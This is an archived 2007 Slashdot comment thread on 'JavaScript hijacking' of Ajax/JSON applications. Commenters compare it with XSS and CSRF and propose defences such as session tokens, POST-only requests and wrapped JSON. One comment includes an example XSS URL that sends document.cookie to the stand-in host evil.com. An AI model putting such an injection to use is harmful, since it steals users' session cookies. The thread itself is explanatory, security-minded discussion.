Security / The Internet

Web 2.0 Under Siege (170 comments)

Posted by Hemos
from the in-dark-territory dept.
Robert writes "Security researchers have found what they say is an entirely new kind of web-based attack, and it only targets the Ajax applications so beloved of the 'Web 2.0' movement. Fortify Software, which said it discovered the new class of vulnerability and has named it 'JavaScript hijacking', said that almost all the major Ajax toolkits have been found vulnerable. 'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'"
This discussion has been archived. No new comments can be posted.

  • XSS (Score:2, Interesting)

    by Anonymous Coward
    So, how is this different than Javascript injection or Cross-site Scripting?
    • Re:XSS (Score:5, Informative)

      by KDan (90353) on Monday April 02, 2007 @11:28AM (#18574367) Homepage
      I think the very subtle difference is that this time the calls are made using site A's public Ajax API, using site A's authentication token, but are made from a script sitting on site B. The javascript calls return with data from site A, which can then be handled by site B. XSS/JS Injection is more about injecting alien javascript onto site A to make site A call site B with the info it wants.

      Daniel
      • Re: (Score:1, Interesting)

        by Anonymous Coward
        Regarding regular XSS...

        XSS/JS Injection is more about injecting alien javascript onto site A ...

        OK so far.

        ... to make site A call site B with the info it wants.

        Darn, I thought it was to make site A execute code/retrieve infos from the user's system, not from another site :(

        Would you care to develop a little bit?

        • Re:XSS (Score:5, Informative)

          by KDan (90353) on Monday April 02, 2007 @11:58AM (#18574817) Homepage
          Sorry, I was writing this in a rush. I meant site A executes the code that was injected, retrieves the resulting data from site A, and then sends that data over to site B (or some other location). Typically this "data" is stuff like login information...

          Daniel
      • Another difference is that with a regular web app you'd have to insert the Javascript into multiple pages in order to have complete control over the target app. In order for there to be a danger to the user's data there'd have to be some data on the page where the Javascript was executed or you'd have to take the user to a custom-built phishing site to get them to enter their data for you. With an app written entirely in Javascript you'd only have to get your code executed once, and/or you wouldn't have to
    • Re: (Score:3, Informative)

      by Cigarra (652458)

      So, how is this different than Javascript injection or Cross-site Scripting?
      It is not. They just HAD to make it to Slashdot's front page.
    • Re: (Score:2, Informative)

      by Anonymous Coward
      This attack seems to be more like CSRF than XSS. You have authenticated to site A, you have a cookie to site A, you navigate to site B. In CSRF, site B performs a hidden form post to update and change information on your account. In this attack, site B performs cross site AJAX calls to steal, update, or change information on your account.

      --Anonymous Coward
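A toy simulation of the distinction the comment above draws (all names and values here are hypothetical, purely for illustration): CSRF fires a state-changing request whose response the attacker never sees, while JavaScript hijacking lets the attacker's page read the response, because a JSON array is also a valid JavaScript expression.

```javascript
// Hypothetical "server" standing in for site A's two kinds of endpoint.
const server = {
  // state-changing endpoint a CSRF hidden-form post would hit
  transfer(amount) { this.balance = (this.balance || 100) - amount; },
  // data endpoint returning JSON that a cross-site <script> tag could evaluate
  contacts() { return '[{"email":"alice@example.com"}]'; },
};

// CSRF-style: the attacker changes state but learns nothing from the response.
server.transfer(40);

// Hijacking-style: the attacker's page evaluates the JSON response as script
// and now holds the victim's data.
const stolen = eval(server.contacts());
```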
  • by Nerdfest (867930) on Monday April 02, 2007 @11:25AM (#18574323)
    Sadly, this is likely to do very little to stop the use of the word 'mashups'.
    • Re: (Score:1, Offtopic)

      by omeomi (675045)
      The only use of the term Mashup that I'm familiar with is the music-oriented one [wikipedia.org]...I guess the "web 2.0" crowd needed another catchy buzzword. Hooray.
      • by Gilmoure (18428)
        I was wondering what this exploit had to do with the Pirates of Penzance crew singing that Baby Got Back song.
        • by omeomi (675045)
          Yeah, I'm somewhat disappointed that I got modded down for my comment...the adoption of new "web 2.0" oriented buzzwords is out of control...
    • by Seumas (6865)
      Or web 2.0.
      Or AJAX.

      Really, let it be the death of both. Too bad it's a couple years too late.
      • Re: (Score:3, Funny)

        by MikeFats (1024245)
        You're right - who doesn't yearn for the good old Pine and Gopher days? I spit on you AJAX and Web 2.0.
  • by Z0mb1eman (629653) on Monday April 02, 2007 @11:26AM (#18574329) Homepage
    How is this different from cross-site scripting?

    "In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."
    • by daviddennis (10926) <david@amazing.com> on Monday April 02, 2007 @11:36AM (#18574511) Homepage
      This is much harder to protect against than normal XSS. Why? Because the Ajax does not have to be executed from within the same domain.

      Let's say someone wants to attack my site, amazing.com. I browse to their site, remarkable.com, and the exploit code gets loaded into my browser. Remarkable.com can post to amazing.com using AJAX and receive replies as though they were authenticated on my site, because the browser automatically sends the amazing.com cookies when accessing an amazing.com URL. It appears to the browser fundamentally as though I was on remarkable.com and then typed the amazing.com URL into the address bar.

      (Of course you could spoof the referer but not from an existing browser session so I think the referer can be relied on in this context.)

      If this is so, then it could truly be a throbbing migraine to fix - you would have to use the HTTP referer field to verify that the site calling your Ajax code was valid.

      Hope that helps. Not the cheeriest news this morning :-(, but hopefully Prototype will have some kind of fix, and life will go on.

      D
      • by Bogtha (906264) on Monday April 02, 2007 @11:47AM (#18574657)

        No, that kind of thing has always been possible since the very first implementation of JavaScript. If you don't need POST, then you can even do it with plain HTML 2.0, no JavaScript.

        The problem here is that JSON is a subset of JavaScript and so it is automatically parsed under the local domain's security context when it's included in a document with <script>. There's a few tricks to "hide" it even though it's already been parsed and is sitting in memory, I assume these guys have found a way around that.
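The point about JSON being a subset of JavaScript can be made concrete with a minimal sketch (the endpoint and data are invented). A JSON array evaluates directly as a JavaScript expression, which is exactly what a cross-site `<script src="...">` include does to it; the safe path is to parse the text, never evaluate it.

```javascript
// Hypothetical JSON response from an authenticated endpoint.
// Note it is an *array*: arrays evaluate as expressions, which is why
// they are the exploitable case (a bare object literal parses as a block).
const jsonResponse = '[{"email":"alice@example.com","secret":"s3cr3t"}]';

// What including the response via a <script> tag effectively does:
// evaluate it as code in the including page's security context.
const evaluated = eval(jsonResponse);

// Safe handling on the legitimate client: parse text, don't run it.
const parsed = JSON.parse(jsonResponse);
```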

      • Re: (Score:3, Interesting)

        by consumer (9588)
        Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer. There are some better techniques described in the Wikipedia XSRF entry.
        • Checking the referer header is ultimately going to fail because it would mean trusting the client to not lie about the referer.

          In this case the client is the victim. Why would a client spoof Referer in order to attack itself?

          It's not perfect, but Referer checking should cover nearly all attacks of this sort.
          • by consumer (9588)
            Many browsers allow JavaScript to set the document.referrer property.
            • by nahdude812 (88157) *
              Even if so it wouldn't affect the HTTP request referrer header.

              Better than this is for the server to give the real page request a random token that is unique per session and which it uses for its ajax calls to verify that it's legitimate. The malicious website would have to guess or otherwise intercept which token had been sent. Remember, only the cookies are sent with the call, and the malicious site can't read the cookies, they can only use them. EvilSite.com site wouldn't be able to access other page
      • by jkauzlar (596349)
        So, I have an honest query for someone who seems knowledgeable about this... does this mean *all* use of AJAX is susceptible to this form of attack or just certain uses.. and in the case of the latter, then what is safe and what is not?
    • Re: (Score:2, Informative)

      by Anonymous Coward
      My thought exactly. More specifically, this sounds like a CSRF attack ( http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org] ).

      Such an attack previously succeeded on Digg (in the form of a white-hat demonstration of a self-Digging website), but that vulnerability has already been patched. The description of the demo attack, which they also refer to as "session riding," is available here: http://4diggers.blogspot.com/ [blogspot.com]
    • Re: (Score:3, Insightful)

      by michaelmalak (91262)
      Cross-site scripting allows a web page browsed by a socially engineered victim to be transmitted to the culprit. JavaScript hijacking is more powerful -- it allows arbitrary data stored on a server (e.g. an entire address book or even all of a user's e-mail on a webmail system) to be transmitted to the culprit.
      • by kestasjk (933987) *
        XSS is a vague term, but lots of people would put "JavaScript hijacking" under the same umbrella as XSS. Your typical XSS attack involves injecting JavaScript into the target domain (this may involve social engineering the victim into going to a URL which will inject the JavaScript, e.g. http://friendly.com/?var=image.src='http://evil.com/'+document.cookie [friendly.com] ).

        If you can inject the JavaScript needed to do this you can usually also get it to read webmail etc. I won't repeat the things given by others that di
  • XSRF (Score:2, Interesting)

    by Anonymous Coward
    How is this different from Cross-Site Request Forgery?

    http://en.wikipedia.org/wiki/Cross-site_request_forgery [wikipedia.org]
  • quick! (Score:5, Funny)

    by mastershake_phd (1050150) on Monday April 02, 2007 @11:30AM (#18574407) Homepage
    Upgrade to Web 3.0, quick!
  • Duh (Score:3, Informative)

    by evil_Tak (964978) on Monday April 02, 2007 @11:34AM (#18574465)
    This has been around for (web) ages. As stated in the summary, it's used all over the place to create mashups because it's one of the only ways around the security requirement that XmlHttpRequest can only talk to the originating server.
  • Mashups? (Score:5, Funny)

    by Rob T Firefly (844560) on Monday April 02, 2007 @11:36AM (#18574509) Homepage Journal

    'JavaScript Hijacking allows an unauthorized attacker to read sensitive data from a vulnerable application using a technique similar to the one commonly used to create mashups'
    So back when I made the Beastie Boys rap over the Macarena tune, [spacemutiny.com] I was really hacking the Web 2.0? And here I thought I was just assaulting eardrums and good taste...
  • by zappepcs (820751) on Monday April 02, 2007 @11:37AM (#18574523) Journal
    that we can sue Morfik? /sarcasm
  • Where's the problem? (Score:5, Interesting)

    by pimterry (970628) on Monday April 02, 2007 @11:39AM (#18574557)
    "In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker."

    So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

    AJAX apps do not need to (and should not!) store user authentication in cookies. Cookies are useful for keeping a continual session open between pages. AJAX needs no continual session. If they don't use cookies, then other sites cannot use that authentication.

    Where's the problem? (What am I missing?)

    PimTerry
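The suggestion above can be sketched as follows (variable and endpoint names are hypothetical): keep the session id in a script variable set after login and send it explicitly in each request body, instead of relying on a cookie the browser attaches automatically. A cross-site `<script>` or form post never carries this field, because the attacking page cannot read the variable.

```javascript
// Session id lives only in this page's script scope, never in a cookie.
let sessionId = null;

function buildRequestBody(params) {
  // Every Ajax call carries the session id explicitly; a cross-site
  // request has no way to read `sessionId` and so cannot include it.
  return JSON.stringify({ session: sessionId, ...params });
}

sessionId = 'abc123'; // would come from the login response in practice
const body = buildRequestBody({ action: 'listContacts' });
```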
    • by TheSunborn (68004) <tiller@[ ]mi.au.dk ['dai' in gap]> on Monday April 02, 2007 @11:49AM (#18574683)
      The problem is your statement that "AJAX needs no continual session".

      AJAX really does need sessions. Just think of Gmail: it is a single AJAX session starting when you log in and finishing when you log out or time out.

      If AJAX didn't use sessions, it would have to authenticate itself with username and password on every request it made to the server.

      A better solution might be to let the AJAX application handle sessions explicitly by storing the session id and sending it in the POST part of all its requests. But that might be a problem with the browser's history, because you would then lose your session id if you used the back button.
      • by daeg (828071)
        Why would it need to reauthenticate with each AJAX request? You can easily just append the session token to the end of your POST (or GET) requests. It goes over the wire in cleartext anyway. All AJAX apps should be using SSL anyway.

        You don't run into this specific problem if you do that. New windows with the same domain name (e.g., gmail.com) don't share the same memory as the original window, thus they won't have the authentication token, and won't have the active cookie, either.
    • Re: (Score:2, Informative)

      by ergo98 (9391)

      But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript.

      Store them in javascript? Huh?

      It is completely normal -- across the entire industry -- to store session identifiers in cookies. There is nothing special or AJAXy about that.
    • by misleb (129952)

      So essentially it means that the attacker can use the authentication cookie of the user to authenticate them again, and then run javascript with that authentication. But why are AJAX apps storing authentication in cookies? If you need to store authentication (User session id's etc), store them in a variable within the javascript. That'll stay there until a page refresh clears variable status, and how many page refreshes occur with AJAX?

      Well, for one thing, AJAX isn't an all or nothing deal. Many sites/app

    • If you need to store authentication (User session id's etc), store them in a variable within the javascript.

      So what then, you pass the userid, sessionid, etc. via the querystring? I don't think that is making things more secure.

      The problem here is that at some point the service has to cough up the data to the caller. If the caller has malicious intent, then what can you do? Meditate on this, I shall. That, or wait for prototype to fix it.
    • If I'm reading the Fortify paper right (I'm in a noisy environment), they say that your proposal will work. The attack is a variation on CSRF, so a similar solution (shared secret nonce) applies.

      Things like this are why I have fun in security. Leveraging execute-only access to code into read access to data is a nifty hack.
  • Shirky's Law: (Score:5, Interesting)

    by sakusha (441986) on Monday April 02, 2007 @11:43AM (#18574613)
    "Social Software is stuff that gets spammed."

    The obvious implication of Shirky's Law is that Web 2.0 services are an attractive nuisance and give spammers and other griefers an incentive to game the system. Any new web service has to account for this and build in extremely high levels of security. Obviously nobody is doing this.
  • by jeevesbond (1066726) on Monday April 02, 2007 @11:46AM (#18574651) Homepage
    I really hope it is. There's no such thing as Web 2.0; some arse decided to put a label on the natural progression the Web was undertaking anyway. It's annoying when authors write that some entirely new, completely re-written version of the Web is--surprisingly--vulnerable; it's the same old Web, just with some new buzz-words.

    This is a vulnerability that appears only when passing JavaScript between client and server. An attacker has to get a potential victim who is logged in to a site that exchanges data in the JSON format using AJAX to visit a page they've set up. The attacker's page can then read the data the server returns to the victim's browser. From the article:

    In an example attack, a victim who has already authenticated themselves to an Ajax application, and has the login cookie in their browser, is persuaded to visit the attacker's web site. This web site contains JavaScript code that makes calls to the Ajax app. Data received from the app is sent to the attacker.

    So it's a known method of attack, but because it's aimed at web sites using AJAX it has to be labelled 'Web 2.0'. Ugh.
  • by slashkitty (21637) on Monday April 02, 2007 @11:47AM (#18574661) Homepage
    It was reported as a problem with the Google address book. These guys just generalized the problem because they saw it in many places.

    It actually could be pretty nasty. I think the only solution is to pass authentication tokens through the URL or input parameters (not through cookies).

    It might be a good time to use the firefox NoScript plugin if you're not using it already. Only allow javascript on sites you trust.

  • Easy Fix (Score:2, Funny)

    by Anonymous Coward
    Just serve up an animated cursor before any XML handshakes. This will stop the attackers from exploiting the AJAX piece.

  • I think the article is a bit exaggerated, but if "Web 2.0" is under attack, it might be a good time to look at this problem. Consider that a lot of people only surf a few websites (to get some news, etc.) and use e-mail. Most people don't use the net for anything more.

    So if I only visit about 10 websites daily, and those 10 sites I'm reasonably sure are safe, why would I go anywhere else if it could cause problems to my computer? I've seen and heard from a lot of people fed up with spyware, adware and vi
    • Re: (Score:2, Insightful)

      by orclevegam (940336)

      All very well and good until one of those ten gets infected by something nasty. I seem to recall seeing an article recently where a big site like CNN or one of them got hit by a worm and was actually serving up infected pages for 48 hours or so till it was discovered and cleaned out. The solution is not to rely on the servers being secure (although securing the servers can't be ignored either), but to ensure that even IF the servers are compromised you aren't vulnerable.

      As much as I hate

      • True enough. I just thought I'd throw the idea out. Several banks, and as you mention popular sites like CNN, haven't escaped hackers either. I didn't want to exclude that argument.

        But yeah, hardened OSes using SELinux or OpenBSD or Vista even are steps in the right direction to address this problem.
  • From TFA..

    Everybody thought that the rise of Ajax as a web programming model would merely exacerbate existing types of attack. Few thought it would give rise to a new class, noted (some random guy).

    Actually, I'd claim "everybody" with a toe in the security world thought it was the opposite; we'd start hearing about daily/weekly Ajax security problems as a regular course of business.

    (If you think various operating systems have legacy code problems; you don't know "Javascript as implemented by browsers"...)

  • by Sam Legend (987900) on Monday April 02, 2007 @12:24PM (#18575173)
    The biggest WTF is that somebody is still using javascript. Oops. Wrong site...
    (Captcha: backtotheweb1.0)
  • by robby_r (1082023) on Monday April 02, 2007 @12:27PM (#18575207)
    All: I encourage all of you to read the detailed report Fortify wrote on this topic. It's written for developers and explains the problem in clear technical detail. http://www.fortifysoftware.com/advisory.jsp [fortifysoftware.com] (No registration required.) It's a long document, but I doubt you'll have a lot of questions after reading it. It's refreshing to see reports written like this that don't insult a developer's intelligence.
  • sigh (Score:5, Insightful)

    by CrazyBrett (233858) on Monday April 02, 2007 @12:33PM (#18575309)
    This just sounds like a fancy Cross-Site Request Forgery.

    I still maintain that the collective blindness to these security issues comes from our absolute refusal to see HTTP requests as function calls. This is partly due to the silly ideology of the REST crowd.

    Rephrase the situation as follows and see if this doesn't make you pee your pants: "Any site can instruct your browser to execute an arbitrary function on another site using your authentication credentials."
    • Re:sigh (Score:4, Interesting)

      by julesh (229690) on Monday April 02, 2007 @01:51PM (#18576547)
      This just sounds like a fancy Cross-Site Request Forgery.

      That'll be because it is. It's basically an observation that CSRF on a site which returns data in JSON format allows the attacker to read the content of the result. Well, duh. Of course that happens. It's one of the reasons I've always opposed JSON as a useful format.

      The other reason is equally bad, but only applies to "mash up" type situations: the coder of the client has to trust the server with access to all data in the client. This makes it useless in many situations.

      The best solution would be to scrap the current security system, make subrequest cookies (including XMLHttpRequests) dependent on both the domain the request goes to *and* the domain of the page that caused the request, and allow XMLHttpRequest to access servers other than the page source. This would both fix CSRF and eliminate the need for JSON. What more do you want? :)
      • by Rich0 (548339)
        I'm still a bit puzzled about why they allow this kind of cross-site interaction in the security model. Shouldn't the sandbox be designed not to allow code on different HTML files to interact, or to only interact if they were loaded from the same site? And shouldn't the sandbox only allow TCP connections back to the site the code came from - and that includes connections created by loading URLs as well. I can see allowing redirections of the entire webpage (ie what is in the location bar), but
        • by julesh (229690)
          There are probably solutions to this as well (don't allow GET/POST of form variables on redirects, don't allow redirecting at all across domains, don't design web apps with such simple interfaces that can be guessed).

          The solution to this requires steps on behalf of both app designers and browser designers:

          * Pages that perform potentially harmful actions should only accept data that is POSTed, not URL parameters. Or require a two step process: first request displays a confirmation page, second page will onl
  • by Anonymous Coward on Monday April 02, 2007 @12:39PM (#18575393)
    An application may be vulnerable if:

    - It uses cookies to store session IDs or other forms of credentials; and
    - It sends data from server to browser using "JSON" notation; and
    - It doesn't require POST data in each request.

    A vulnerable application can be fixed by changing any of these three aspects:

    - Stop using cookies, and instead supply the credentials in the request's URL or POST data.
    - Don't use JSON, or munge your JSON so that it can't be run directly from within a <script> tag; for example, you could put comments around it in the server and strip them off in your client.
    - Have the client send some POST data and check for it on the server (a <script> tag can't send POST data).

    My preference, and the strategy that I've used in Anyterm and Decimail Webmail, is to not use cookies. To me it actually seems easier to put the session ID in the request, rather than to mess around with cookies.

    The advisory, which explains it all but is a bit waffly at the start, is at http://www.fortifysoftware.com/servlet/downloads/public/JavaScript_Hijacking.pdf [fortifysoftware.com]
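The "munge your JSON" fix from the list above can be sketched in a few lines (function names are invented for illustration): the server wraps the payload in a comment so that a bare cross-site `<script>` include parses to nothing, while the legitimate same-origin client, which can read the raw response text, strips the wrapper before parsing.

```javascript
// Server side: wrap the JSON payload in a JavaScript comment.
// Evaluated via a <script> tag, the whole body is a no-op comment.
function wrapForTransport(obj) {
  return '/*' + JSON.stringify(obj) + '*/';
}

// Client side: only same-origin code with access to the raw response
// text (e.g. via XMLHttpRequest) can strip the comment and parse.
function unwrapAndParse(body) {
  return JSON.parse(body.slice(2, -2));
}

const wire = wrapForTransport({ user: 'alice', balance: 100 });
const data = unwrapAndParse(wire);
```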
  • by unity100 (970058) on Monday April 02, 2007 @12:44PM (#18575467) Homepage Journal
    If you delegate operations and processes to the client side, sooner or later people will find more ways to exploit it, to the point that offering such client-side features becomes a security risk, making anti-virus, anti-spyware, and privacy product manufacturers more agitated about it, and in the end drawing visitors away from your site due to blocks, issues, and fear.
  • by Animats (122034) on Monday April 02, 2007 @12:50PM (#18575577) Homepage

    XML is now so last week. Really l33t web apps use JSON, which is yet another way to write S-expressions like those of LISP, but now in Javascript brackets.

    There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org]. Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole. Second, there's an attack similar to the ones involving redefining XMLHttpRequest: redefining the Array constructor. [getahead.org] (Caution, page contains proof of concept exploit.)

    The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable. It's not clear how to allow "mashups" and prevent this. The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

    As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

    • I'll ignore the debunked *XML is S-expressions* bait for the chance to second your critique of JavaScript and the inherent problems with the AJ part of AJAX.
    • by julesh (229690) on Monday April 02, 2007 @02:08PM (#18576797)
      There are several security problems with JSON. First, some web apps parse JSON notation by feeding it into JavaScript's "eval". Now that was dumb.

      You don't say. My first thought on hearing about the entire idea was "why would you want to let a foreign server run its code on your page?"

      The real problem is JavaScript's excessive dynamism. Because you can redefine objects in one script and have that affect another script from a different source, the language is fundamentally vulnerable.

      Err... if I don't let foreign code execute (e.g. by doing 'var e = document.createElement("script"); e.src = "http://www.someotherserver.com/potential-security-risk"; document.body.appendChild(e);', which I've seen many scripts do) how can another site redefine the objects in my script? I think the vulnerability is that most JS programmers are too willing to let other sites execute arbitrary code in their own context, which really ain't good.

      The last attempt to fix this problem involved adding restrictions to XMLHttpRequest, but that only plugged some of the holes.

      The fix seems obvious to me:

      * cookies in subrequests must be tied to the domain of the page that initiated the request as well as the domain the request goes to; this reduces the possibility of CSRF. So if www.a.com has a web page that requests data from www.b.com, it will only send a cookie if www.b.com set one in response to a previous request from www.a.com. This applies to SCRIPT tags, to IFRAME tags, to IMG tags, to LINK tags, etc.

      * XMLHttpRequest must not be tied to the same-domain policy. Attempts to access a different domain should result in a request for confirmation from the user for the first time any particular requester/receiver domain pair is used. This means mashups (and other applications that need cross-domain access) can be written that do not need to use JSON. JSON parsing through script insertion or eval() is insecure, and should be deprecated.

      As a minimum, it's probably desirable to insist in the browser that, on secure pages, all Javascript and data must come from the main page of the domain. No "mashups" with secure pages.

      Scripts, yes. I don't see the need to ensure that data originates in the same domain.
    • >First, some web apps parse JSON notation by feeding it into JavaScript's "eval" [json.org]. Now that was dumb. Some JSON support code "filters" the incoming data before the EVAL, but the most popular implementation missed filtering something and left a hole.

      Isn't this the same lesson that led to giving up on suid shell scripts? Try to "filter" input to a rich general-purpose language and you always miss something. Especially when the language can be tweaked at runtime, be it with an IFS environment vari
  • AKA, the security programmer's favorite adage: "The user is the enemy."

    That is, when ANY new technique or code module is to be used in a production environment, it should not be considered ready until it has been thoroughly attacked by a person who has the kind of mind-set that will expose code vulnerabilities before a user (or set of users) finds them.

    Trouble is, most IT organizations have a hard sell to get that type of person within the company -- first, because an "inside the firewall" attacker is count

  • First the MS cursor exploit [slashdot.org], now this. How are we supposed to surf the web, anymore? That's it! I'm going back to Morse Code:
    _-_- ___ __ - __- - _ --- ___ __ - --- _ ___ -__-

  • Are there any working examples of this problem we could see? I'm having trouble understanding exactly what the issue is supposed to be.
  • “Web 2.0” is not AJAX and “AJAX” is not Web 2.0. These terms are not synonyms nor does one necessarily imply the other. Yes, AJAX is an important participant, but Web 2.0 is really about service architecture [oreillynet.com] that is equally consumable by machines and people—a notion that somewhat embodies the original vision of the Web. The article title “Web 2.0 Under Siege” is misleading nonsense. It is analogous to stating that programming is “under siege” because

  • What a crock. This has got zero to do with ajax. For example, even with 'insecure' PHP - the first line of any backend ajax code should read something like ..

    require_once("include/session.inc");

    Where session.inc reads the user cookie (or whatever authentication mechanism your app uses) and sets up a validated user.

    There is NO DIFFERENCE in the way users are authenticated between server side code that renders a regular page, and server side code that is called by ajax. One generally returns HTML, the ot
  • ASP.NET Ajax [asp.net], with the default settings, is protected [asp.net] against these attacks.
